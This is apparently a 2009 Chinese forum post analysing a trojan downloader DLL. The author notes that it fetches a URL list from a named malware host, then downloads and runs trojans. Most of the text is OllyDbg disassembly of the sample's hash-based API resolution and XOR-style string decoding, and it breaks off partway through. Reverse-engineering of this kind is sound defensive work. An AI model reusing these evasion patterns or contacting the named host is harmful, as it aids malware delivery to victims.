-
-
[原创]dll下载器分析
-
发表于: 2009-7-25 17:49 7339
-
下载器DLL.
基本信息:
文件名:DLL.dll
导出函数: DLL.dll->Export()
保护情况: 未加壳, 不过API调用地址皆为动态获得, 部分call中插入了大量垃圾代码.
主要行文: 从http://b2g.wo123.info/02/count.txt读取下载地址列表, 下载木马执行.
没啥技术含量, 错误之处难免, 欢饮各位指正.
DLLEntryPoint:
10001000 >/$ 55 push ebp
10001001 |. 8BEC mov ebp, esp
10001003 |. B8 01000000 mov eax, 1
10001008 |. 5D pop ebp
10001009 \. C2 0C00 retn 0C
1000100C CC int3
1000100D CC int3
1000100E CC int3
1000100F CC int3
10001010 >/$ 55 push ebp ; (initial cpu selection)
10001011 |. 8BEC mov ebp, esp
10001013 |. 81EC 2C010000 sub esp, 12C
10001019 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
1000101F |. E8 7C210000 call <FillApiAddress_stub>
10001024 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
1000102A |. E8 91210000 call 100031C0 ; 主要动作call
1000102F |. C785 D4FEFFFF>mov dword ptr [ebp-12C], 0
10001039 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
1000103F |. E8 FC1F0000 call 10003040 ; FreeLibrary等收尾动作.
10001044 |. 8B85 D4FEFFFF mov eax, dword ptr [ebp-12C]
1000104A |. 8BE5 mov esp, ebp
1000104C |. 5D pop ebp
1000104D \. C3 retn
DllEntryPoint处并无代码. 主要行文在其导出函数中的Export中. OD加载之, 修改OEP为10001010(Export).
1000101F |. E8 7C210000 call <FillApiAddress_stub> : 得到所有需要使用的API地址.
FillApiAddress_stub:
100031A0 >/$ 55 push ebp
100031A1 |. 8BEC mov ebp, esp
100031A3 |. 51 push ecx
100031A4 |. 894D FC mov dword ptr [ebp-4], ecx
100031A7 |. 8B4D FC mov ecx, dword ptr [ebp-4]
100031AA |. E8 D1E1FFFF call <Fill_API_Address>
100031AF |. 8B45 FC mov eax, dword ptr [ebp-4]
100031B2 |. 8BE5 mov esp, ebp
100031B4 |. 5D pop ebp
100031B5 \. C3 retn
再看 这个call ->Fill_API_Address :
10001380 >/$ 55 push ebp
10001381 |. 8BEC mov ebp, esp
10001383 |. 83EC 64 sub esp, 64
10001386 |. 894D 9C mov dword ptr [ebp-64], ecx
10001389 |. 68 324C4C09 push 94C4C32 ; 这个是某个API的Hash值。以下同之...
1000138E |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001391 |. E8 BAFFFFFF call <GetAPIAddressByHash>
10001396 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001399 |. 8901 mov dword ptr [ecx], eax
1000139B |. 68 96566F6A push 6A6F5696
100013A0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100013A3 |. E8 A8FFFFFF call <GetAPIAddressByHash>
100013A8 |. 8B55 9C mov edx, dword ptr [ebp-64]
100013AB |. 8942 04 mov dword ptr [edx+4], eax
100013AE |. 68 F3462869 push 692846F3
100013B3 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100013B6 |. E8 95FFFFFF call <GetAPIAddressByHash>
100013BB |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100013BE |. 8941 08 mov dword ptr [ecx+8], eax
100013C1 |. 68 A3D03508 push 835D0A3
100013C6 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100013C9 |. E8 82FFFFFF call <GetAPIAddressByHash>
100013CE |. 8B55 9C mov edx, dword ptr [ebp-64]
100013D1 |. 8942 58 mov dword ptr [edx+58], eax
100013D4 |. C645 F4 00 mov byte ptr [ebp-C], 0
100013D8 |. C645 F5 26 mov byte ptr [ebp-B], 26
100013DC |. C645 F6 30 mov byte ptr [ebp-A], 30
100013E0 |. C645 F7 27 mov byte ptr [ebp-9], 27
100013E4 |. C645 F8 66 mov byte ptr [ebp-8], 66
100013E8 |. C645 F9 67 mov byte ptr [ebp-7], 67
100013EC |. C645 FA 7B mov byte ptr [ebp-6], 7B
100013F0 |. C645 FB 11 mov byte ptr [ebp-5], 11
100013F4 |. C645 FC 19 mov byte ptr [ebp-4], 19
100013F8 |. C645 FD 19 mov byte ptr [ebp-3], 19
100013FC |. C645 FE 55 mov byte ptr [ebp-2], 55
10001400 |. 6A 55 push 55
10001402 |. 6A 0B push 0B
10001404 |. 8D45 F4 lea eax, dword ptr [ebp-C]
10001407 |. 50 push eax
10001408 |. 8D4D F4 lea ecx, dword ptr [ebp-C]
1000140B |. 51 push ecx
1000140C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000140F |. E8 3CFCFFFF call <DecodeString>
10001414 |. 8D55 F4 lea edx, dword ptr [ebp-C]
10001417 |. 52 push edx
10001418 |. 8B45 9C mov eax, dword ptr [ebp-64]
1000141B |. 8B08 mov ecx, dword ptr [eax]
1000141D |. FFD1 call ecx
1000141F |. 8B55 9C mov edx, dword ptr [ebp-64]
10001422 |. 8982 18010000 mov dword ptr [edx+118], eax
10001428 |. C645 DC 00 mov byte ptr [ebp-24], 0
1000142C |. C645 DD 3E mov byte ptr [ebp-23], 3E
10001430 |. C645 DE 39 mov byte ptr [ebp-22], 39
10001434 |. C645 DF 3E mov byte ptr [ebp-21], 3E
10001438 |. C645 E0 39 mov byte ptr [ebp-20], 39
1000143C |. C645 E1 32 mov byte ptr [ebp-1F], 32
10001440 |. C645 E2 23 mov byte ptr [ebp-1E], 23
10001444 |. C645 E3 79 mov byte ptr [ebp-1D], 79
10001448 |. C645 E4 33 mov byte ptr [ebp-1C], 33
1000144C |. C645 E5 3B mov byte ptr [ebp-1B], 3B
10001450 |. C645 E6 3B mov byte ptr [ebp-1A], 3B
10001454 |. C645 E7 57 mov byte ptr [ebp-19], 57
10001458 |. 6A 57 push 57
1000145A |. 6A 0C push 0C
1000145C |. 8D45 DC lea eax, dword ptr [ebp-24]
1000145F |. 50 push eax
10001460 |. 8D4D DC lea ecx, dword ptr [ebp-24]
10001463 |. 51 push ecx
10001464 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001467 |. E8 E4FBFFFF call <DecodeString>
1000146C |. 8D55 DC lea edx, dword ptr [ebp-24]
1000146F |. 52 push edx
10001470 |. 8B45 9C mov eax, dword ptr [ebp-64]
10001473 |. 8B08 mov ecx, dword ptr [eax]
10001475 |. FFD1 call ecx
10001477 |. 8B55 9C mov edx, dword ptr [ebp-64]
1000147A |. 8982 14010000 mov dword ptr [edx+114], eax
10001480 |. C645 CC 00 mov byte ptr [ebp-34], 0
10001484 |. C645 CD 25 mov byte ptr [ebp-33], 25
10001488 |. C645 CE 37 mov byte ptr [ebp-32], 37
1000148C |. C645 CF 20 mov byte ptr [ebp-31], 20
10001490 |. C645 D0 31 mov byte ptr [ebp-30], 31
10001494 |. C645 D1 28 mov byte ptr [ebp-2F], 28
10001498 |. C645 D2 72 mov byte ptr [ebp-2E], 72
1000149C |. C645 D3 73 mov byte ptr [ebp-2D], 73
100014A0 |. C645 D4 6F mov byte ptr [ebp-2C], 6F
100014A4 |. C645 D5 25 mov byte ptr [ebp-2B], 25
100014A8 |. C645 D6 2D mov byte ptr [ebp-2A], 2D
100014AC |. C645 D7 2D mov byte ptr [ebp-29], 2D
100014B0 |. C645 D8 41 mov byte ptr [ebp-28], 41
100014B4 |. 6A 41 push 41
100014B6 |. 6A 0D push 0D
100014B8 |. 8D45 CC lea eax, dword ptr [ebp-34]
100014BB |. 50 push eax
100014BC |. 8D4D CC lea ecx, dword ptr [ebp-34]
100014BF |. 51 push ecx
100014C0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100014C3 |. E8 88FBFFFF call <DecodeString>
100014C8 |. 8D55 CC lea edx, dword ptr [ebp-34]
100014CB |. 52 push edx
100014CC |. 8B45 9C mov eax, dword ptr [ebp-64]
100014CF |. 8B08 mov ecx, dword ptr [eax]
100014D1 |. FFD1 call ecx
100014D3 |. 8B55 9C mov edx, dword ptr [ebp-64]
100014D6 |. 8982 1C010000 mov dword ptr [edx+11C], eax
100014DC |. 68 7222FB14 push 14FB2272
100014E1 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100014E4 |. E8 67FEFFFF call <GetAPIAddressByHash>
100014E9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100014EC |. 8941 0C mov dword ptr [ecx+C], eax
100014EF |. 68 4E5BCD68 push 68CD5B4E
100014F4 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100014F7 |. E8 54FEFFFF call <GetAPIAddressByHash>
100014FC |. 8B55 9C mov edx, dword ptr [ebp-64]
100014FF |. 8942 10 mov dword ptr [edx+10], eax
10001502 |. 68 21DF0371 push 7103DF21
10001507 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000150A |. E8 41FEFFFF call <GetAPIAddressByHash>
1000150F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001512 |. 8941 14 mov dword ptr [ecx+14], eax
10001515 |. 68 7F5E1071 push 71105E7F
1000151A |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000151D |. E8 2EFEFFFF call <GetAPIAddressByHash>
10001522 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001525 |. 8942 18 mov dword ptr [edx+18], eax
10001528 |. 68 676D5640 push 40566D67
1000152D |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001530 |. E8 1BFEFFFF call <GetAPIAddressByHash>
10001535 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001538 |. 8941 40 mov dword ptr [ecx+40], eax
1000153B |. 68 81694C21 push 214C6981
10001540 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001543 |. E8 08FEFFFF call <GetAPIAddressByHash>
10001548 |. 8B55 9C mov edx, dword ptr [ebp-64]
1000154B |. 8942 30 mov dword ptr [edx+30], eax
1000154E |. 68 B790E44F push 4FE490B7
10001553 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001556 |. E8 F5FDFFFF call <GetAPIAddressByHash>
1000155B |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000155E |. 8941 24 mov dword ptr [ecx+24], eax
10001561 |. 68 13BD9F28 push 289FBD13
10001566 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001569 |. E8 E2FDFFFF call <GetAPIAddressByHash>
1000156E |. 8B55 9C mov edx, dword ptr [ebp-64]
10001571 |. 8942 2C mov dword ptr [edx+2C], eax
10001574 |. 68 A4746248 push 486274A4
10001579 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000157C |. E8 CFFDFFFF call <GetAPIAddressByHash>
10001581 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001584 |. 8941 34 mov dword ptr [ecx+34], eax
10001587 |. 68 38869B14 push 149B8638
1000158C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000158F |. E8 BCFDFFFF call <GetAPIAddressByHash>
10001594 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001597 |. 8942 38 mov dword ptr [edx+38], eax
1000159A |. 68 7B228232 push 3282227B
1000159F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015A2 |. E8 A9FDFFFF call <GetAPIAddressByHash>
100015A7 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015AA |. 8941 3C mov dword ptr [ecx+3C], eax
100015AD |. 68 D8FB457A push 7A45FBD8
100015B2 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015B5 |. E8 96FDFFFF call <GetAPIAddressByHash>
100015BA |. 8B55 9C mov edx, dword ptr [ebp-64]
100015BD |. 8942 4C mov dword ptr [edx+4C], eax
100015C0 |. 68 021C0C66 push 660C1C02
100015C5 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015C8 |. E8 83FDFFFF call <GetAPIAddressByHash>
100015CD |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015D0 |. 8941 48 mov dword ptr [ecx+48], eax
100015D3 |. 68 843A4E26 push 264E3A84
100015D8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015DB |. E8 70FDFFFF call <GetAPIAddressByHash>
100015E0 |. 8B55 9C mov edx, dword ptr [ebp-64]
100015E3 |. 8982 A0000000 mov dword ptr [edx+A0], eax
100015E9 |. 68 5110E64E push 4EE61051
100015EE |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015F1 |. E8 5AFDFFFF call <GetAPIAddressByHash>
100015F6 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100015F9 |. 8981 9C000000 mov dword ptr [ecx+9C], eax
100015FF |. 68 5A78941B push 1B94785A
10001604 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001607 |. E8 44FDFFFF call <GetAPIAddressByHash>
1000160C |. 8B55 9C mov edx, dword ptr [ebp-64]
1000160F |. 8942 50 mov dword ptr [edx+50], eax
10001612 |. 68 7F2A1034 push 34102A7F
10001617 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000161A |. E8 31FDFFFF call <GetAPIAddressByHash>
1000161F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001622 |. 8941 54 mov dword ptr [ecx+54], eax
10001625 |. C645 A0 00 mov byte ptr [ebp-60], 0
10001629 |. C645 A1 2D mov byte ptr [ebp-5F], 2D
1000162D |. C645 A2 29 mov byte ptr [ebp-5E], 29
10001631 |. C645 A3 38 mov byte ptr [ebp-5D], 38
10001635 |. C645 A4 09 mov byte ptr [ebp-5C], 9
10001639 |. C645 A5 24 mov byte ptr [ebp-5B], 24
1000163D |. C645 A6 24 mov byte ptr [ebp-5A], 24
10001641 |. C645 A7 27 mov byte ptr [ebp-59], 27
10001645 |. C645 A8 2B mov byte ptr [ebp-58], 2B
10001649 |. C645 A9 48 mov byte ptr [ebp-57], 48
1000164D |. C645 E8 00 mov byte ptr [ebp-18], 0
10001651 |. C645 E9 2D mov byte ptr [ebp-17], 2D
10001655 |. C645 EA 29 mov byte ptr [ebp-16], 29
10001659 |. C645 EB 38 mov byte ptr [ebp-15], 38
1000165D |. C645 EC 0E mov byte ptr [ebp-14], 0E
10001661 |. C645 ED 3A mov byte ptr [ebp-13], 3A
10001665 |. C645 EE 2D mov byte ptr [ebp-12], 2D
10001669 |. C645 EF 2D mov byte ptr [ebp-11], 2D
1000166D |. C645 F0 48 mov byte ptr [ebp-10], 48
10001671 |. C645 BC 00 mov byte ptr [ebp-44], 0
10001675 |. C645 BD 22 mov byte ptr [ebp-43], 22
10001679 |. C645 BE 33 mov byte ptr [ebp-42], 33
1000167D |. C645 BF 0B mov byte ptr [ebp-41], 0B
10001681 |. C645 C0 26 mov byte ptr [ebp-40], 26
10001685 |. C645 C1 34 mov byte ptr [ebp-3F], 34
10001689 |. C645 C2 33 mov byte ptr [ebp-3E], 33
1000168D |. C645 C3 02 mov byte ptr [ebp-3D], 2
10001691 |. C645 C4 35 mov byte ptr [ebp-3C], 35
10001695 |. C645 C5 35 mov byte ptr [ebp-3B], 35
10001699 |. C645 C6 28 mov byte ptr [ebp-3A], 28
1000169D |. C645 C7 35 mov byte ptr [ebp-39], 35
100016A1 |. C645 C8 47 mov byte ptr [ebp-38], 47
100016A5 |. 6A 48 push 48
100016A7 |. 6A 0A push 0A
100016A9 |. 8D55 A0 lea edx, dword ptr [ebp-60]
100016AC |. 52 push edx
100016AD |. 8D45 A0 lea eax, dword ptr [ebp-60]
100016B0 |. 50 push eax
100016B1 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016B4 |. E8 97F9FFFF call <DecodeString>
100016B9 |. 6A 48 push 48
100016BB |. 6A 09 push 9
100016BD |. 8D4D E8 lea ecx, dword ptr [ebp-18]
100016C0 |. 51 push ecx
100016C1 |. 8D55 E8 lea edx, dword ptr [ebp-18]
100016C4 |. 52 push edx
100016C5 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016C8 |. E8 83F9FFFF call <DecodeString>
100016CD |. 6A 47 push 47
100016CF |. 6A 0D push 0D
100016D1 |. 8D45 BC lea eax, dword ptr [ebp-44]
100016D4 |. 50 push eax
100016D5 |. 8D4D BC lea ecx, dword ptr [ebp-44]
100016D8 |. 51 push ecx
100016D9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016DC |. E8 6FF9FFFF call <DecodeString>
100016E1 |. 8D55 A0 lea edx, dword ptr [ebp-60]
100016E4 |. 52 push edx
100016E5 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016E8 |. E8 03FBFFFF call <GetApiAddressByName>
100016ED |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016F0 |. 8941 20 mov dword ptr [ecx+20], eax
100016F3 |. 8D55 E8 lea edx, dword ptr [ebp-18]
100016F6 |. 52 push edx
100016F7 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016FA |. E8 F1FAFFFF call <GetApiAddressByName>
100016FF |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001702 |. 8941 28 mov dword ptr [ecx+28], eax
10001705 |. 8D55 BC lea edx, dword ptr [ebp-44]
10001708 |. 52 push edx
10001709 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000170C |. E8 DFFAFFFF call <GetApiAddressByName>
10001711 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001714 |. 8941 1C mov dword ptr [ecx+1C], eax
10001717 |. 68 B44ACE32 push 32CE4AB4
1000171C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000171F |. E8 FCFBFFFF call 10001320
10001724 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001727 |. 8942 44 mov dword ptr [edx+44], eax
1000172A |. 68 CBCC7737 push 3777CCCB
1000172F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001732 |. E8 19FCFFFF call <GetAPIAddressByHash>
10001737 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000173A |. 8941 5C mov dword ptr [ecx+5C], eax
1000173D |. 68 50AC2749 push 4927AC50
10001742 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001745 |. E8 76FBFFFF call <GetAPIAddressByHash_2>
1000174A |. 8B55 9C mov edx, dword ptr [ebp-64]
1000174D |. 8942 60 mov dword ptr [edx+60], eax
10001750 |. 68 F4AD4248 push 4842ADF4
10001755 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001758 |. E8 63FBFFFF call <GetAPIAddressByHash_2>
1000175D |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001760 |. 8941 64 mov dword ptr [ecx+64], eax
10001763 |. 68 280BC820 push 20C80B28
10001768 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000176B |. E8 50FBFFFF call <GetAPIAddressByHash_2>
10001770 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001773 |. 8942 68 mov dword ptr [edx+68], eax
10001776 |. 68 ACB3A87C push 7CA8B3AC
1000177B |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000177E |. E8 3DFBFFFF call <GetAPIAddressByHash_2>
10001783 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001786 |. 8941 6C mov dword ptr [ecx+6C], eax
10001789 |. 68 2B7BF742 push 42F77B2B
1000178E |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001791 |. E8 2AFBFFFF call <GetAPIAddressByHash_2>
10001796 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001799 |. 8942 70 mov dword ptr [edx+70], eax
1000179C |. 68 28F71F71 push 711FF728
100017A1 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017A4 |. E8 17FBFFFF call <GetAPIAddressByHash_2>
100017A9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017AC |. 8941 74 mov dword ptr [ecx+74], eax
100017AF |. 68 DE218261 push 618221DE
100017B4 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017B7 |. E8 04FBFFFF call <GetAPIAddressByHash_2>
100017BC |. 8B55 9C mov edx, dword ptr [ebp-64]
100017BF |. 8942 78 mov dword ptr [edx+78], eax
100017C2 |. 68 F96C390C push 0C396CF9
100017C7 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017CA |. E8 81FBFFFF call <GetAPIAddressByHash>
100017CF |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017D2 |. 8941 7C mov dword ptr [ecx+7C], eax
100017D5 |. 68 42352A45 push 452A3542
100017DA |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017DD |. E8 6EFBFFFF call <GetAPIAddressByHash>
100017E2 |. 8B55 9C mov edx, dword ptr [ebp-64]
100017E5 |. 8982 A4000000 mov dword ptr [edx+A4], eax
100017EB |. 68 26DD3C66 push 663CDD26
100017F0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017F3 |. E8 58FBFFFF call <GetAPIAddressByHash>
100017F8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100017FB |. 8981 A8000000 mov dword ptr [ecx+A8], eax
10001801 |. 68 4296AE01 push 1AE9642
10001806 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001809 |. E8 42FBFFFF call <GetAPIAddressByHash>
1000180E |. 8B55 9C mov edx, dword ptr [ebp-64]
10001811 |. 8982 AC000000 mov dword ptr [edx+AC], eax
10001817 |. 68 D8C1973B push 3B97C1D8
1000181C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000181F |. E8 2CFBFFFF call <GetAPIAddressByHash>
10001824 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001827 |. 8981 B0000000 mov dword ptr [ecx+B0], eax
1000182D |. 68 43081E4E push 4E1E0843
10001832 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001835 |. E8 16FBFFFF call <GetAPIAddressByHash>
1000183A |. 8B55 9C mov edx, dword ptr [ebp-64]
1000183D |. 8982 80000000 mov dword ptr [edx+80], eax
10001843 |. 68 28FBEB70 push 70EBFB28
10001848 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000184B |. E8 00FBFFFF call <GetAPIAddressByHash>
10001850 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001853 |. 8981 84000000 mov dword ptr [ecx+84], eax
10001859 |. 68 27A66374 push 7463A627
1000185E |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001861 |. E8 EAFAFFFF call <GetAPIAddressByHash>
10001866 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001869 |. 8982 88000000 mov dword ptr [edx+88], eax
1000186F |. 68 10DB0433 push 3304DB10
10001874 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001877 |. E8 D4FAFFFF call <GetAPIAddressByHash>
1000187C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000187F |. 8981 8C000000 mov dword ptr [ecx+8C], eax
10001885 |. 68 04B5FE3A push 3AFEB504
1000188A |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000188D |. E8 BEFAFFFF call <GetAPIAddressByHash>
10001892 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001895 |. 8982 94000000 mov dword ptr [edx+94], eax
1000189B |. 68 78684D20 push 204D6878
100018A0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018A3 |. E8 A8FAFFFF call <GetAPIAddressByHash>
100018A8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018AB |. 8981 98000000 mov dword ptr [ecx+98], eax
100018B1 |. 68 A1360E45 push 450E36A1
100018B6 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018B9 |. E8 92FAFFFF call <GetAPIAddressByHash>
100018BE |. 8B55 9C mov edx, dword ptr [ebp-64]
100018C1 |. 8982 90000000 mov dword ptr [edx+90], eax
100018C7 |. 68 C0058F0B push 0B8F05C0
100018CC |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018CF |. E8 1CFAFFFF call <GetAPIAddressByHash_2>
100018D4 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018D7 |. 8981 B4000000 mov dword ptr [ecx+B4], eax
100018DD |. 68 07166015 push 15601607
100018E2 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018E5 |. E8 06FAFFFF call <GetAPIAddressByHash_2>
100018EA |. 8B55 9C mov edx, dword ptr [ebp-64]
100018ED |. 8982 B8000000 mov dword ptr [edx+B8], eax
100018F3 |. 68 2DAF9C4E push 4E9CAF2D
100018F8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100018FB |. E8 F0F9FFFF call <GetAPIAddressByHash_2>
10001900 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001903 |. 8981 BC000000 mov dword ptr [ecx+BC], eax
10001909 |. 68 01144601 push 1461401
1000190E |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001911 |. E8 DAF9FFFF call <GetAPIAddressByHash_2>
10001916 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001919 |. 8982 04010000 mov dword ptr [edx+104], eax
1000191F |. 68 2EBBE374 push 74E3BB2E
10001924 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001927 |. E8 24FAFFFF call <GetAPIAddressByHash>
1000192C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000192F |. 8981 C0000000 mov dword ptr [ecx+C0], eax
10001935 |. 68 10CA4937 push 3749CA10
1000193A |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000193D |. E8 0EFAFFFF call <GetAPIAddressByHash>
10001942 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001945 |. 8982 C4000000 mov dword ptr [edx+C4], eax
1000194B |. 68 B73CF449 push 49F43CB7
10001950 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001953 |. E8 F8F9FFFF call <GetAPIAddressByHash>
10001958 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000195B |. 8981 C8000000 mov dword ptr [ecx+C8], eax
10001961 |. 68 EE4A7F2C push 2C7F4AEE
10001966 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001969 |. E8 E2F9FFFF call <GetAPIAddressByHash>
1000196E |. 8B55 9C mov edx, dword ptr [ebp-64]
10001971 |. 8982 CC000000 mov dword ptr [edx+CC], eax
10001977 |. 68 4DD72863 push 6328D74D
1000197C |. 8B4D 9C mov ecx, dword ptr [ebp-64]
1000197F |. E8 CCF9FFFF call <GetAPIAddressByHash>
10001984 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001987 |. 8981 D0000000 mov dword ptr [ecx+D0], eax
1000198D |. 68 9FD49516 push 1695D49F
10001992 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001995 |. E8 B6F9FFFF call <GetAPIAddressByHash>
1000199A |. 8B55 9C mov edx, dword ptr [ebp-64]
1000199D |. 8982 D8000000 mov dword ptr [edx+D8], eax
100019A3 |. 68 9AC2BE2A push 2ABEC29A
100019A8 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100019AB |. E8 A0F9FFFF call <GetAPIAddressByHash>
100019B0 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100019B3 |. 8981 DC000000 mov dword ptr [ecx+DC], eax
100019B9 |. C645 AC 00 mov byte ptr [ebp-54], 0
100019BD |. C645 AD 3F mov byte ptr [ebp-53], 3F
100019C1 |. C645 AE 24 mov byte ptr [ebp-52], 24
100019C5 |. C645 AF 22 mov byte ptr [ebp-51], 22
100019C9 |. C645 B0 23 mov byte ptr [ebp-50], 23
100019CD |. C645 B1 37 mov byte ptr [ebp-4F], 37
100019D1 |. C645 B2 3A mov byte ptr [ebp-4E], 3A
100019D5 |. C645 B3 17 mov byte ptr [ebp-4D], 17
100019D9 |. C645 B4 3A mov byte ptr [ebp-4C], 3A
100019DD |. C645 B5 3A mov byte ptr [ebp-4B], 3A
100019E1 |. C645 B6 39 mov byte ptr [ebp-4A], 39
100019E5 |. C645 B7 35 mov byte ptr [ebp-49], 35
100019E9 |. C645 B8 13 mov byte ptr [ebp-48], 13
100019ED |. C645 B9 2E mov byte ptr [ebp-47], 2E
100019F1 |. C645 BA 56 mov byte ptr [ebp-46], 56
100019F5 |. 6A 56 push 56
100019F7 |. 6A 0F push 0F
100019F9 |. 8D55 AC lea edx, dword ptr [ebp-54]
100019FC |. 52 push edx
100019FD |. 8D45 AC lea eax, dword ptr [ebp-54]
10001A00 |. 50 push eax
10001A01 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A04 |. E8 47F6FFFF call <DecodeString>
10001A09 |. 8D4D AC lea ecx, dword ptr [ebp-54]
10001A0C |. 51 push ecx
10001A0D |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A10 |. E8 DBF7FFFF call <GetApiAddressByName>
10001A15 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001A18 |. 8982 D4000000 mov dword ptr [edx+D4], eax
10001A1E |. 68 C021115F push 5F1121C0
10001A23 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A26 |. E8 25F9FFFF call <GetAPIAddressByHash>
10001A2B |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A2E |. 8981 E0000000 mov dword ptr [ecx+E0], eax
10001A34 |. 68 62B2F477 push 77F4B262
10001A39 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A3C |. E8 0FF9FFFF call <GetAPIAddressByHash>
10001A41 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001A44 |. 8982 E4000000 mov dword ptr [edx+E4], eax
10001A4A |. 68 7BB7AA51 push 51AAB77B
10001A4F |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A52 |. E8 F9F8FFFF call <GetAPIAddressByHash>
10001A57 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A5A |. 8981 E8000000 mov dword ptr [ecx+E8], eax
10001A60 |. 68 962F901C push 1C902F96
10001A65 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A68 |. E8 E3F8FFFF call <GetAPIAddressByHash>
